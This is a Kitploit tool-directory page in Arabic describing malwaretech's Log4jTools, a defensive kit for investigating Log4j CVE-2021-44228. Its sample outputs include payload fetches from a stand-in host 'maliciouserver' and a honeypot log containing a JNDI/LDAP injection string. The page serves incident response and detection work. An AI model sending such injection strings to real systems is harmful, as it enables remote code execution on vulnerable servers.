Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4jTools — أدوات للتحقيق في Log4j CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/malwaretech/log4jtools
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتكشف التسلل
GitHubmalwaretech/log4jtools

Log4jTools

أدوات للتحقيق في Log4j CVE-2021-44228

عرض المستودع
9412منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4jTools

أدوات للتحقيق في ثغرة Log4j CVE-2021-44228

شرح الثغرة وعرض توضيحي

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (الحصول على حمولة java من مسار ldap المقدم في استعلام JNDI).

المتطلبات: curl (النظام)، requests (بايثون)

مثال على الأمر:

root@kitploit:~
python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py (خادم فخ لجذب محاولات الاستغلال بناءً على وجود '${' ).

المتطلبات: python3، asyncore

مثال على الأمر:

root@kitploit:~
python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1
تنزيل الأداة